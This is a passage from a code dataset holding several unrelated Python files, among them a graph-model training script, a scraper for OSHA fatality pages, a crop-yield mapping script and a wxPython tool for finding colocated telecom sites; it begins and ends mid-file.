center[1] + halfaxes[1]*np.sin(np.linspace(0,2*np.pi,N))]).T \n if isinstance(domain, DifferenceOfnBoxes) and (len(domain.inner) == 1):\n lengths = [bound[1] - bound[0] for bound in domain.outer.bounds]\n weights = np.array(lengths*2)/2/np.sum(lengths)\n bnds_inner, bnds_outer = domain.inner[0].bounds, domain.outer.bounds\n xs = np.concatenate([np.linspace(0.5*(bnds_inner[0][0]+bnds_outer[0][0]), 0.5*(bnds_inner[0][1]+bnds_outer[0][1]), weights[0]*N),\n 0.5*(bnds_outer[0][1]+bnds_inner[0][1])*np.ones(weights[1]*N),\n np.linspace(0.5*(bnds_inner[0][1]+bnds_outer[0][1]), 0.5*(bnds_inner[0][0]+bnds_outer[0][0]), weights[2]*N),\n 0.5*(bnds_outer[0][0]+bnds_inner[0][0])*np.ones(weights[3]*N)])\n ys = np.concatenate([0.5*(bnds_outer[1][0]+bnds_inner[1][0])*np.ones(weights[0]*N),\n np.linspace(0.5*(bnds_outer[1][0]+bnds_inner[1][0]), 0.5*(bnds_inner[1][1]+bnds_outer[1][1]), weights[1]*N),\n 0.5*(bnds_outer[1][1]+bnds_inner[1][1])*np.ones(weights[2]*N),\n np.linspace(0.5*(bnds_inner[1][1]+bnds_outer[1][1]), 0.5*(bnds_inner[1][0]+bnds_outer[1][0]), weights[3]*N)])\n return np.array([xs, ys]).T\n else:\n raise Exception('For now circular_tour only works on nBoxes and the difference of 2 nBoxes')\n \ndef quicksample(bounds, A, eta):\n \"\"\" Function returning actions sampled from the solution of the Dual Averaging \n update on an Box with Affine losses, Exponential Potential. \"\"\"\n C1, C2 = np.exp(-eta*A*bounds[:,0]), np.exp(-eta*A*bounds[:,1])\n Finv = lambda U: -np.log(C1 - (C1-C2)*U)/A/eta\n np.random.seed()\n return Finv(np.random.rand(*A.shape))\n\ndef CNR_worker(prob, *args, **kwargs):\n \"\"\" Helper function for wrapping class methods to allow for easy \n use of the multiprocessing package for parallel computing \"\"\"\n return prob.run_simulation(*args, **kwargs)\n\n","sub_path":"ContNoRegret/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"5795236","text":"\"\"\"\nSIGN model application\nauthor: Yixin Su\n\"\"\"\nimport tensorflow as tf\nimport argparse\nfrom model_SIGN import SIGN\nimport LoadData_SIGN as DATA\nfrom sklearn.metrics import roc_auc_score\nimport pickle\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--path', nargs='?', default='../data/',\n help='Input data path.')\n parser.add_argument('--dataset', nargs='?', default='twitter',\n help='Choose a dataset.')\n parser.add_argument('--dataset_type', type=int, default=0,\n help='which kind of dataset: 0: graph based dataset; 1: FM based dataset')\n parser.add_argument('--epoch', type=int, default=50,\n help='Number of epochs.')\n parser.add_argument('--batch_size', type=int, default=512,\n help='Batch size.')\n parser.add_argument('--hidden_factor', type=int, default=8,\n help='Number of hidden factors.')\n parser.add_argument('--mlp_layers', nargs='?', default='[32]',\n help=\"Size of each mlp layer.\")\n parser.add_argument('--num_class', type=int, default=2,\n help='Number of graph classes.')\n parser.add_argument('--keep_prob', type=float, default=0.5, \n help='dropout ratio')\n parser.add_argument('--lr', type=float, default=0.05,\n help='Learning rate.')\n parser.add_argument('--lambda_l0', type=float, default=0.01,\n help='lambda for l0 regularization.')\n parser.add_argument('--lambda_l2', type=float, default=0.01,\n help='lambda for l2 regularization on node embedding.')\n parser.add_argument('--lambda_upd', type=float, default=0.05,\n help='lambda for l2 regularization on node embedding.')\n parser.add_argument('--reverse_rate', type=float, default=0.0,\n help='reverse rate')\n parser.add_argument('--l0_para', nargs='?', default='[0.66, -0.1, 1.1]',\n help=\"l0 parameters, which are beta (temprature), \\\n zeta (interval_min) and gama (interval_max).\")\n parser.add_argument('--predict_edge', type=int, default=1,\n help='0: use true edge (if any); 1: predict edge use L0 norm; 2: use full edge ')\n parser.add_argument('--test_ratio', type=float, default=0.1,\n help='ratio of true edges that used to evaluate link prediction')\n parser.add_argument('--fast_test', type=int, default=0,\n help='Whether to perform fast test (Valid-Test) or not (Train-Valid) (0 or 1)')\n \n return parser.parse_args()\n\n\ndef generate_feed_data(data_dict, batch_size, datatype, pred_edge=True):\n node_list = data_dict['nodes']\n sender_ori = data_dict['sender']\n receiver_ori = data_dict['receiver']\n full_edge_label_ori = data_dict['full_edge_label']\n num_data = len(receiver_ori)\n edge_num_list = [len(sl) for sl in sender_ori]\n node_num_list = [len(nl) for nl in node_list]\n segment_ids = []\n node_index = []\n node_id_list = []\n sender = []\n receiver = []\n full_edge_label = []\n labels = []\n total_edge_num = []\n \n ind = 0\n while ind < num_data:\n current_sender_ori = sender_ori[ind:(ind+batch_size)]\n current_receiver_ori = receiver_ori[ind:(ind+batch_size)]\n current_full_edge_label_ori = full_edge_label_ori[ind:(ind+batch_size)]\n current_segement_ids = []\n current_node_index = []\n current_edge_num_list = edge_num_list[ind:(ind+batch_size)]\n current_node_num_list = node_num_list[ind:(ind+batch_size)]\n current_node_list = []\n current_node_list_list = node_list[ind:(ind+batch_size)]\n for nl in current_node_list_list:\n current_node_list += nl\n\n \n total_edge_num.append(sum([len(g_e) for g_e in current_sender_ori]))\n \n for i in range(len(current_edge_num_list)):\n current_segement_ids += [i for j in range(current_edge_num_list[i])]\n for i in range(len(current_node_num_list)):\n current_node_index += [i for j in range(current_node_num_list[i])]\n \n current_sender = []\n current_receiver = []\n current_full_edge_label = []\n \n for i in range(len(current_sender_ori)):\n current_sender += current_sender_ori[i]\n current_receiver += current_receiver_ori[i]\n current_full_edge_label += current_full_edge_label_ori[i]\n\n \n labels.append(data_dict['label'][ind:(ind+batch_size)])\n sender.append(current_sender)\n receiver.append(current_receiver)\n full_edge_label.append(current_full_edge_label)\n segment_ids.append(current_segement_ids)\n node_index.append(current_node_index)\n node_id_list.append(current_node_list)\n \n ind += batch_size\n \n return sender, receiver, full_edge_label, segment_ids, node_index, node_id_list, labels, total_edge_num\n\n\nif __name__ == '__main__':\n args = parse_args()\n \n #Anounce the configeration\n print(\"Verbose: \\n\\tDataset: %s \\n\\tPredict Edge: %d \\n\\tHidden Factor: %d \\n\\tmlp layer: %s \\n\\\n Learning rate: %.4f \\n\\tBatch size: %d \\n\\tEpoch: %d \\n\\tlambda (l0, l2, upd) %s \\n\\\n L_0 parameter (if predict edge): %s \\n\\tReverse Rate: %s \\n\\tFast test: %d\" % (args.dataset, \n args.predict_edge, args.hidden_factor, args.mlp_layers, args.lr,\n args.batch_size, args.epoch, str([args.lambda_l0, args.lambda_l2,\n args.lambda_upd]), args.l0_para, args.reverse_rate, args.fast_test))\n \n \n data = DATA.LoadData(args.path, args.dataset, predict_edge=args.predict_edge)\n\n num_node = data.node_num\n print(\"Node No: %d\" %(num_node))\n\n model = SIGN(\n num_node, \n args.hidden_factor, \n args.num_class,\n lamda_l0=args.lambda_l0, \n lamda_l2=args.lambda_l2,\n lamda_upd=args.lambda_upd,\n l0_para = eval(args.l0_para),\n dropout=args.keep_prob,\n mlp_layer=eval(args.mlp_layers),\n pred_edges=args.predict_edge,\n reverse_edge_rate=args.reverse_rate)\n\n loss_t, loss_l0, loss_l2 = model.get_loss()\n optimizer = tf.compat.v1.train.AdagradOptimizer(\n learning_rate = args.lr, \n initial_accumulator_value=1e-8\n ).minimize(loss_t)\n train_op_t = optimizer\n optimizer_l0 = tf.compat.v1.train.AdagradOptimizer(\n learning_rate = args.lr, \n initial_accumulator_value=1e-8\n ).minimize(loss_l0)\n train_op_l0 = optimizer_l0\n optimizer_l2 = tf.compat.v1.train.AdagradOptimizer(\n learning_rate = args.lr, \n initial_accumulator_value=1e-8\n ).minimize(loss_l2)\n train_op_l2 = optimizer_l2\n\n if args.fast_test == 0:\n sender, receiver, full_edge_label, segment_ids, node_index, node_id_list, labels, total_edge_num = \\\n generate_feed_data(data.train_data, args.batch_size, args.dataset_type)\n sender_valid, receiver_valid, full_edge_label_valid, segment_ids_valid, node_index_valid, node_id_list_valid, labels_valid, total_edge_num_valid = \\\n generate_feed_data(data.test_data, len(data.test_data['sender']), args.dataset_type)\n else:\n sender, receiver, full_edge_label, segment_ids, node_index, node_id_list, labels, total_edge_num = \\\n generate_feed_data(data.valid_data, args.batch_size, args.dataset_type)\n sender_valid, receiver_valid, full_edge_label_valid, segment_ids_valid, node_index_valid, node_id_list_valid, labels_valid, total_edge_num_valid = \\\n generate_feed_data(data.test_data, len(data.test_data['sender']), args.dataset_type)\n \n with tf.Session() as sess:\n init_g = tf.global_variables_initializer()\n init_l = tf.local_variables_initializer()\n sess.run(init_g)\n sess.run(init_l)\n\n num_edges_pic = []\n auc_pic = []\n acc_pic =[]\n\n for ep in range(args.epoch):\n train_loss = []\n for round_num in range(len(labels)):\n feed_dict = {}\n feed_dict[model.senders_ph] = sender[round_num]\n feed_dict[model.receivers_ph] = receiver[round_num]\n feed_dict[model.segment_ids] = segment_ids[round_num]\n feed_dict[model.graph_index_ph] = node_index[round_num]\n feed_dict[model.graph_node_id_ph] = node_id_list[round_num]\n feed_dict[model.labels] = labels[round_num]\n feed_dict[model.num_data] = len(labels[round_num])\n feed_dict[model.epoch] = [ep]\n feed_dict[model.is_training] = True \n if args.predict_edge == 0 or args.predict_edge == 1:\n feed_dict[model.true_edge] = full_edge_label[round_num]\n\n _, train_base_loss = sess.run([train_op_t, model.base_loss], feed_dict=feed_dict)\n train_loss.append(train_base_loss)\n \n feed_dict = {}\n feed_dict[model.senders_ph] = sender_valid[0]\n feed_dict[model.receivers_ph] = receiver_valid[0]\n feed_dict[model.segment_ids] = segment_ids_valid[0]\n feed_dict[model.graph_index_ph] = node_index_valid[0]\n feed_dict[model.graph_node_id_ph] = node_id_list_valid[0]\n feed_dict[model.labels] = labels_valid[0]\n feed_dict[model.num_data] = len(labels_valid[0])\n feed_dict[model.epoch] = [1]\n feed_dict[model.is_training] = False \n if args.predict_edge == 0 or args.predict_edge == 1:\n feed_dict[model.true_edge] = full_edge_label_valid[0]\n\n if args.dataset_type == 0 and args.predict_edge == 1:\n _loss, l2, l0, num_edges, _accuracy, _class_auc, _g_S, edge_acc, update_node_emb = sess.run(\n [model.base_loss, model.l2_loss, model.l0_loss, model.num_edges,\n model.class_accuracy, model.class_auc, model.loc, model.edge_auc, model.update_node_emb], \n feed_dict=feed_dict)\n \n print(\"Epoch: %d, train_loss: %.5f, loss: %s, class_auc: %.5f, acc: %.5f, l2: %.5f, l0: %.5f, edge n: %d, edge_auc: %.5f\" %\n (ep, sum(train_loss)/len(train_loss), str(_loss), _class_auc[0], _accuracy, \\\n l2, l0, num_edges, edge_acc[0]))\n \n num_edges_pic.append(num_edges)\n auc_pic.append(_class_auc[0])\n acc_pic.append(_accuracy)\n if ep %50 == 0:\n pickle.dump((num_edges_pic, auc_pic, acc_pic), open('../store/{}/result_{}.pkl'.format(args.dataset, ep), 'wb'))\n \n else:\n _loss, base, l2, num_edges, _class_acc, _class_auc, _g_S, test = sess.run(\n [model.base_loss, model.base_loss, model.l2_loss, model.num_edges, model.class_accuracy,\\\n model.class_auc, model.g_S, model.softmax_g_out], \n feed_dict=feed_dict)\n \n print(\"Epoch: %d, class_auc: %.5f, acc: %.5f, loss: %.5f, base: %.5f, l2_norm: %.5f, edge n: %d\" %\n (ep, _class_auc[0], _class_acc, _loss, base, l2, num_edges))\n ","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"473752473","text":"\ndef bounding_box(grid):\n xmin = min(x for x, _ in grid)\n xmax = max(x for x, _ in grid)\n ymin = min(y for _, y in grid)\n ymax = max(y for _, y in grid)\n return xmin, xmax + 1, ymin, ymax + 1\n\ndef draw(grid, bounds=None, X=None):\n if not grid:\n return\n xmin, xmax, ymin, ymax = bounds or bounding_box(grid)\n for y in range(ymin, ymax):\n for x in range(xmin, xmax):\n if (x, y) == X:\n character = 'X'\n else:\n character = grid.get((x, y), ' ')\n print(character, end='')\n print()\n","sub_path":"2019/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"598621908","text":"import numpy\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom operator import add\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\"Pokeboi.py\", \"C:/Users/W. Baker/OneDrive/Documents/GitHub/PokeBoiBot/PokeboiSeperated/Pokeboi.py\")\npb = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(pb)\n\n\n\nactionvalue=numpy.load(\"actionvalue.npy\")\n\nwinCounter=0\nbattleCounter=0\nwhile battleCounter<1000:\n\n pok11=pb.pokeboi(5,5,1)\n pok22=pb.pokeboi(5,5,1)\n \n pb.BattleWinnerAI(pok11,actionvalue,pok22,actionvalue)\n battleCounter+=1\n if pok11.HP>0:\n winCounter+=1\n#elif pok11.HP==0:\n# print(\"AI lost\")\nprint(winCounter/battleCounter*100)\nprint(pok11.moveHistoryTime[0:20])\nxT=numpy.linspace(0,pok11.battlenum,dtype=int)\ny1=pok11.moveHistoryTime[xT, 0]\ny2=pok11.moveHistoryTime[xT, 1]\ny3=pok11.moveHistoryTime[xT, 2]\n\nfig, (ax1,ax2,ax3) = plt.subplots(3,1)\nfig.suptitle(\"Move vs Time\")\n\nax1.plot(xT,y1)\nax1.set_ylabel(\"Kill\")\n\nax2.plot(xT,y2)\nax2.set_ylabel(\"Atk buff\")\n\nax3.plot(xT,y3)\nax3.set_ylabel(\"Def buff\")\n\nplt.show()","sub_path":"PokeboiSeperated/MarkovStratInq.py","file_name":"MarkovStratInq.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"497396379","text":"\"\"\"\nHere are the default parameters used in all the package\nThere are 1.path 2.filenames 3.learning parameters\n\"\"\"\nimport os\n\n#\n# ALL DEFAULT PATH\n#\n\nBASE_PATH = os.path.join('data/')\n\nDATA_PATH = os.path.join(BASE_PATH, 'set/')\nREDUCTED_DATA_PATH = os.path.join(BASE_PATH, 'reducted/')\nMODEL_PATH = os.path.join(BASE_PATH, 'models/')\nGRAPH_PATH = os.path.join(BASE_PATH, 'graph/')\n\n\n#\n# ALL DEFAULT FILENAME\n#\n\n# File containing data to be t-SNEed\nINPUT_FILE_BASE_NAME = 'preprocessed_inputs'\nRAW_NAME = 'originals'\n\n# default RN for predictions\nDEFAULT_PREDICTOR = 'adv_meta_23-08predict'\n\n# A version is a string added to the end of each filename\nVERSION = '_20170925'\n\n# data output name (labels)\nOUTPUT_NAME = 'account'\n\n\n#\n# ALL LEARNING PARAMETERS\n#\n\n# t-SNE parameters\n# best tuple so far is (50,1000,pca,15000)\nPARAMS_LEARNING = {\n 'perplexities' : [40,50,65,80],\n # roughly the number of neighbors in cluster\n # https://lvdmaaten.github.io/publications/papers/JMLR_2008.pdf\n # p4\n 'learning_rates': [800, 1000],\n 'inits' : ['random'], #deprecated, use pca_variance_needed instead\n 'n_iters' : [12000]\n }\n\n# t-SNE parameters for the reduced data we will draw\nPARAMS_VIZ = {\n 'perplexity' : 65,\n 'learning_rate': 1000,\n 'init' : 'random', #deprecated, use pca_variance_needed instead\n 'n_iter' : 12000,\n }\n\nPCA_MIN_VARIANCE = 0.9 # 90% of explained_variance in test case\n\n# 30 for OVH, 50 for local, 15 for epinal\nREDUCTION_SIZE_FACTOR = 1\n","sub_path":"vizuka/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"65499796","text":"\"\"\"General HUC12 mapper\"\"\"\nfrom __future__ import print_function\n\nimport datetime\nimport sys\n\nfrom pyiem.plot import MapPlot, nwsprecip\nfrom shapely.wkb import loads\nimport psycopg2\nimport numpy as np\nimport cartopy.crs as ccrs\nfrom matplotlib.patches import Polygon\nimport matplotlib.colors as mpcolors\n\n\ndef main(argv):\n \"\"\"Do Great Things\"\"\"\n year = int(argv[1])\n pgconn = psycopg2.connect(database='idep', host='localhost',\n port=5555, user='nobody')\n cursor = pgconn.cursor()\n\n mp = MapPlot(continentalcolor='white', nologo=True,\n sector='custom',\n south=36.8, north=45.0, west=-99.2, east=-88.9,\n subtitle='Assumes 56 lb test weight',\n title=('%s Corn Yield HUC12 Average'\n ) % (year, ))\n\n cursor.execute(\"\"\"\n with hucs as (\n select huc_12, ST_Transform(simple_geom, 4326) as geo\n from huc12),\n data as (\n SELECT huc12, avg(yield_kgm2) * 8921.8 / 56. as val from harvest\n where crop = 'Corn' and valid between %s and %s\n GROUP by huc12\n )\n\n SELECT geo, huc12, val from hucs h JOIN data d on (h.huc_12 = d.huc12)\n \"\"\", (datetime.date(year, 1, 1), datetime.date(year, 12, 31)))\n\n bins = np.arange(0, 310, 30)\n cmap = nwsprecip()\n cmap.set_under('white')\n cmap.set_over('black')\n norm = mpcolors.BoundaryNorm(bins, cmap.N)\n\n for row in cursor:\n polygon = loads(row[0].decode('hex'))\n arr = np.asarray(polygon.exterior)\n points = mp.ax.projection.transform_points(ccrs.Geodetic(),\n arr[:, 0], arr[:, 1])\n color = cmap(norm([float(row[2]), ]))[0]\n poly = Polygon(points[:, :2], fc=color, ec='None', zorder=2, lw=.1)\n mp.ax.add_patch(poly)\n\n mp.draw_colorbar(bins, cmap, norm, units='bu/acre')\n\n # mp.drawcounties()\n mp.postprocess(filename='test.png')\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"scripts/plots/huc12_map.py","file_name":"huc12_map.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"302541935","text":"from openpyxl import load_workbook\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\n\n\nfname = '../OHSA Fatality Data.xlsx'\n\nwb = load_workbook(filename=fname)\nsheet_ranges = wb['Sheet1']\n\ncol_pos = 2\nscan_count = 0\n\nfloop = True\nwhile floop==True:\n cur_value = sheet_ranges['e'+str(col_pos)].value\n \n sys.stdout.write(\"Scan count: %d \\r\" % (col_pos))\n sys.stdout.flush()\n\n if sheet_ranges['H'+str(col_pos)].value != None and sheet_ranges['J'+str(col_pos)].value != None:\n col_pos = col_pos + 1\n continue\n\n if cur_value == None:\n floop = False\n else:\n cur_link = sheet_ranges['e'+str(col_pos)].hyperlink.display\n page = requests.get(cur_link)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n results = soup.find(id=\"maincontain\")\n\n elem = results.find('table', class_='tablei_100 table-borderedi_100')\n try:\n elems = elem.find_all('tr')\n except Exception as inst:\n sys.stdout.write(\"\\n\")\n print(inst)\n col_pos = col_pos + 1\n continue\n \n item = elems[2].find('td')\n \n try:\n sheet_ranges['h'+str(col_pos)].value = item.text\n except Exception as inst:\n print(\"\\n IllegalCharacterError\")\n\n try:\n item = elems[3].find('td')\n keywords = item.text.replace(item.find('strong').text, \"\")\n sheet_ranges['j'+str(col_pos)].value = keywords\n except Exception as inst:\n print(\"\")\n \n try:\n items = elems[5].find_all('td')\n sheet_ranges['i'+str(col_pos)].value = items[6].text\n except Exception as inst:\n print(\"\")\n\n scan_count = scan_count + 1\n if scan_count == 20:\n wb.save(filename=fname)\n scan_count = 0\n \n \n\n col_pos = col_pos + 1\n\nsys.stdout.write(\"\\n\")\n \nwb.save(filename=fname)\n\nprint(\"Successfully completed!\")\nexit()\n\n\n\n\n\n# table-responsive\n#tablei_100 table-borderedi_100\n#tbody h 3rd tr thumbnail\n# j 4th tr Keywords:...\n# i 6th tr Occupation 7th td","sub_path":"openpyxl-branch-3.0/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"341005909","text":"import os, sys\r\nimport wx\r\nimport wx.lib.agw.multidirdialog as MDD\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom math import sin, cos, asin, sqrt, degrees, radians\r\nimport time\r\n\r\n\r\n#Global Variable Declaration\r\n#directory --> \"Upload File..\"\r\ndirectory=\"\"\r\n#file stores the file name selected coresponding to directory\r\nfile=\"\"\r\n#parameter_oprx stores the selected spectrum of operator-x \r\nparameter_opr1=[]\r\nparameter_opr2=[]\r\n\r\n# mean, max, standard deviation,limit of the spectrum\r\nmean=[]\r\nmaximum=[]\r\nsd=[]\r\nlimit=[]\r\nlsti=[]\r\nlstv=[]\r\n\r\n\r\n\r\nEarth_radius_km = 6371.0\r\nRADIUS = Earth_radius_km\r\nwildcard = \"Excel Sheet (*.xlsx)|*.xlsx|\" \\\r\n \"All files (*.*)|*.*\"\r\n \r\n#MyForm class calls the Framework \r\nclass MyForm(wx.Frame):\r\n \r\n def __init__(self):\r\n wx.Frame.__init__(self, None, wx.ID_ANY, title='Nokia',size=wx.Size(450, 100))\r\n \r\n # Add a panel so it looks correct on all platforms\r\n self.panel = wx.Panel(self, wx.ID_ANY)\r\n self.currentDirectory = os.getcwd()\r\n\r\n#Defining componentes of Framework i.e., the buttons,TextBox,Static Text\r\n bmp = wx.ArtProvider.GetBitmap(wx.ART_INFORMATION, wx.ART_OTHER, (16, 16))\r\n titleIco = wx.StaticBitmap(self.panel, wx.ID_ANY, bmp)\r\n title = wx.StaticText(self.panel, wx.ID_ANY, 'Frame-Work Info')\r\n\r\n title1 = wx.StaticText(self.panel, wx.ID_ANY, 'Upload Site Data Sheet')\r\n openFileDlgBtn = wx.Button(self.panel, label=\"Upload File..\")\r\n openFileDlgBtn.Bind(wx.EVT_BUTTON, self.onOpenFile)\r\n\r\n para1 = wx.StaticText(self.panel, wx.ID_ANY, 'Operator-1: Parameter')\r\n para2 = wx.StaticText(self.panel, wx.ID_ANY, 'Operator-2: Parameter')\r\n\r\n mylist=['2G-Payload','3G-Payload','4G-Payload']\r\n self.box1=wx.ListBox(self.panel,-1,(20,20),(100,100),mylist,wx.LB_MULTIPLE)\r\n self.box1.Bind(wx.EVT_LISTBOX, self.on_click1,self.box1)\r\n\r\n self.box2=wx.ListBox(self.panel,-1,(20,20),(100,100),mylist,wx.LB_MULTIPLE)\r\n self.box2.Bind(wx.EVT_LISTBOX, self.on_click2,self.box2)\r\n \r\n title2 = wx.StaticText(self.panel, wx.ID_ANY, 'Create Excel File of Colocation Pair')\r\n okBtn2 = wx.Button(self.panel, label=\"Create File\")\r\n okBtn2.Bind(wx.EVT_BUTTON, self.onCreate)\r\n\r\n title3 = wx.StaticText(self.panel, wx.ID_ANY, 'Generate Capacity Analysis Excel Sheet')\r\n okBtn = wx.Button(self.panel, wx.ID_ANY, 'OK')\r\n cancelBtn = wx.Button(self.panel, wx.ID_ANY, 'Cancel')\r\n self.Bind(wx.EVT_BUTTON, self.onOK, okBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onCancel, cancelBtn)\r\n \r\n #Putting components into BoxSizer which is basically a layout\r\n topSizer = wx.BoxSizer(wx.VERTICAL)\r\n titleSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n uploadSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n paratextSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n coloSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n paraSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n btnSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n \r\n #Adding Corresponding Component to there boxes\r\n titleSizer.Add(title, 0, wx.ALL, 5)\r\n titleSizer.Add(titleIco, 0, wx.ALL, 5)\r\n \r\n \r\n uploadSizer.Add(title1, 0, wx.ALL, 5)\r\n uploadSizer.Add(openFileDlgBtn, 0, wx.ALL, 5)\r\n\r\n coloSizer.Add(title2, 0, wx.ALL, 5)\r\n coloSizer.Add(okBtn2, 0, wx.ALL, 5)\r\n\r\n paratextSizer.Add(para1, 0, wx.ALL, 5)\r\n paratextSizer.Add(para2, 0, wx.ALL, 5)\r\n\r\n paraSizer.Add(self.box1, 0, wx.ALL, 5)\r\n paraSizer.Add(self.box2, 0, wx.ALL, 5)\r\n\r\n \r\n btnSizer.Add(title3, 0, wx.ALL, 5) \r\n btnSizer.Add(okBtn, 0, wx.ALL, 5)\r\n btnSizer.Add(cancelBtn, 0, wx.ALL, 5)\r\n \r\n topSizer.Add(titleSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(uploadSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(paratextSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5) \r\n topSizer.Add(paraSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(coloSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(btnSizer, 0, wx.ALL|wx.CENTER, 5)\r\n \r\n # SetSizeHints(minW, minH, maxW, maxH)\r\n self.SetSizeHints(250,300,500,400)\r\n \r\n self.panel.SetSizer(topSizer)\r\n topSizer.Fit(self)\r\n#Framework Layout is done, now defining there function which will be called\r\n\r\n#onCreate generate the colocation pair sheet \r\n def onCreate(self, event):\r\n print(\"Wait Code running...\")\r\n st=directory\r\n os.chdir(st)\r\n xl = pd.ExcelFile(file)\r\n dfv=xl.parse(xl.sheet_names[0])\r\n dfi=xl.parse(xl.sheet_names[1])\r\n df = pd.DataFrame(columns=['Site','Long-1','Lat-1','Colocated site','Long-2','Lat-2','Distance'])\r\n start_time = time.time()\r\n c=0\r\n for i in range(len(dfv)):\r\n for j in range(len(dfi)): \r\n d=self.distance_between_points(float(dfv.iat[i,2]), float(dfv.iat[i,1]), float(dfi.iat[j,2]), float(dfi.iat[j,1]))\r\n if(d<0.05):\r\n s=pd.Series([dfv.iat[i,0],dfv.iat[i,1],dfv.iat[i,2],dfi.iat[j,0],dfi.iat[j,1],dfi.iat[j,2],d],index=['Site','Long-1','Lat-1','Colocated site','Long-2','Lat-2','Distance'])\r\n df=df.append(s, ignore_index=True)\r\n c+=1\r\n newfile=directory+\"\\Colocation.xlsx\"\r\n newfile.replace('\"','')\r\n writer = pd.ExcelWriter(newfile)\r\n df.to_excel(writer,sheet_name=\"Site_colocation\",index=False)\r\n writer.save()\r\n print(\"--- %d Colocations ---\" % (c))\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n print ('onOK handler')\r\n\r\n def onCancel(self, event):\r\n self.closeProgram()\r\n\r\n \r\n def closeProgram(self):\r\n self.Close()\r\n\r\n#updates the operator-1 parameters as soon it is selected\r\n def on_click1(self,event):\r\n global parameter_opr1\r\n parameter_opr1=self.box1.GetSelections()\r\n print(parameter_opr1)\r\n\r\n#updates the operator-2 parameters as soon it is selected\r\n def on_click2(self,event):\r\n global parameter_opr2\r\n parameter_opr2=self.box2.GetSelections()\r\n print(parameter_opr2)\r\n \r\n#Generates Capacity Analysis of the colocation pair\r\n def onOK(self,event):\r\n print(\"Wait Code running...\")\r\n \r\n#Reading the file\r\n st=directory\r\n os.chdir(st)\r\n xl = pd.ExcelFile(file)\r\n dfv=xl.parse(xl.sheet_names[0])\r\n dfi=xl.parse(xl.sheet_names[1])\r\n dfall=pd.concat([dfi,dfv],axis=0)\r\n\r\n \r\n clm_idea=[]\r\n clm_idea=(list(dfi))\r\n num_array_idea=[]\r\n all_para_idea=[]\r\n for i in range(4,len(clm_idea)):\r\n all_para_idea.append(clm_idea[i])\r\n num_array_idea.append(i)\r\n\r\n clm_voda=[]\r\n clm_voda=(list(dfv))\r\n\r\n num_array_voda=[]\r\n all_para_voda=[]\r\n for i in range(4,len(clm_voda)):\r\n all_para_voda.append(clm_voda[i])\r\n num_array_voda.append(i)\r\n\r\n parameter_voda=list()\r\n num = len(parameter_opr1)\r\n for i in range(int(num)):\r\n parameter_voda.append(clm_voda[parameter_opr1[i]+4])\r\n\r\n print(parameter_voda)\r\n\r\n parameter_idea=list()\r\n num = len(parameter_opr2)\r\n for i in range(int(num)):\r\n parameter_idea.append(clm_idea[parameter_opr2[i]+4])\r\n\r\n print(parameter_idea)\r\n\r\n for i in range(len(all_para_idea)):\r\n mean.append(dfall[all_para_idea[i]].mean())\r\n maximum.append(dfall[all_para_idea[i]].max())\r\n\r\n for i in range(len(all_para_idea)):\r\n sd.append(dfall[all_para_idea[i]].std())\r\n limit.append(mean[i]+2*sd[i])\r\n\r\n\r\n start_time = time.time()\r\n#creating header of the file\r\n clm=['Site','Long-1','Lat-1']\r\n for i in range(len(all_para_idea)):\r\n clm.append(all_para_idea[i])\r\n clm.append('Colocated Site')\r\n clm.append('Long-2')\r\n clm.append('Lat-2')\r\n for i in range(len(all_para_voda)):\r\n clm.append(all_para_voda[i])\r\n clm.append('Distance')\r\n for i in range(len(all_para_voda)):\r\n clm.append('Dominant-'+all_para_voda[i])\r\n clm.append('Analysis WRT:'+all_para_voda[i])\r\n \r\n clm.append('Final Dominant')\r\n df = pd.DataFrame(columns=clm)\r\n\r\n#for each site in dfi, iterating over dfv to find colocation and getting the capacity analysis\r\n for i in range(len(dfi)):\r\n for j in range(len(dfv)): \r\n d=self.distance_between_points(float(dfi.iat[i,2]), float(dfi.iat[i,1]), float(dfv.iat[j,2]), float(dfv.iat[j,1]))\r\n if(d<0.05):\r\n 